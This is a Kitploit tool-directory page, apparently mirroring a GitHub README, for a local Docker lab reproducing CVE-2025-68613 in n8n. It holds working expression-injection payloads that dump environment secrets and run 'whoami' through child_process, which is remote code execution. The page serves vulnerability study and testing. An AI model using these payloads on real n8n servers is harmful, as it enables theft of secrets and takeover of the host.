Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-68613-n8n-lab — CVE-2025-68613 分析 | Kitploit
工具/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

CVE-2025-68613 分析

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-68613 本地 n8n 实验环境

本仓库提供了一个简单的 Docker Compose 配置,用于运行一个存在漏洞的 n8n 实例,以便在本地测试 CVE-2025-68613。

环境要求

  • Docker Desktop 或 Docker Engine
  • Docker Compose v2

快速开始

  1. 启动容器:

    root@kitploit:~
    docker compose up -d
    
  2. 在浏览器中打开 n8n:

    • http://localhost:5678
  3. 使用 docker-compose.yml 中设置的默认凭据登录:

    • 用户名:admin
    • 密码:password

停止并清理

root@kitploit:~
docker compose down

免责声明与安全性

此环境仅用于本地隔离测试。请勿将此实例暴露到公共互联网或任何不受信任的网络。请将其保留在专用、仅限本地的网络网段中,并与生产系统隔离。使用风险自负。

验证漏洞(概念验证)

容器运行后,您可以通过 http://localhost:5678 访问 n8n 界面。要测试该漏洞,您需要在表达式字段中注入恶意的 JavaScript 载荷。 复现步骤:

  1. 登录:访问仪表盘(如果您配置了基础认证,请使用提供的凭据;否则,创建一个新的所有者账户)。
  2. 创建工作流:点击“添加工作流”或导航至 https://n8n.example.com/workflow/new。
  3. 添加节点:添加一个“Set”节点。
  4. 注入载荷:在 Set 节点的“Value”字段中(如果可用,请确保切换为“表达式”模式,或直接粘贴 n8n 会将其解释为表达式的语法),输入以下任一载荷: 测试 1:环境变量窃取 此载荷尝试访问进程环境变量,其中通常包含机密信息。
root@kitploit:~
{{ (function() { return this.process.env; })() }}

环境变量窃取示例

测试 2:远程代码执行(RCE) 此载荷尝试加载 child_process 模块以运行系统命令(例如 whoami)。

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

id 命令的 RCE 示例

预期结果:如果环境存在漏洞,Set 节点的“Output”面板将显示命令的执行结果(例如 root 或 n8n 用户),或包含环境变量的 JSON 对象。如果实例已修补(例如 1.122.0+ 版本),沙箱将返回空对象或错误。

下载工具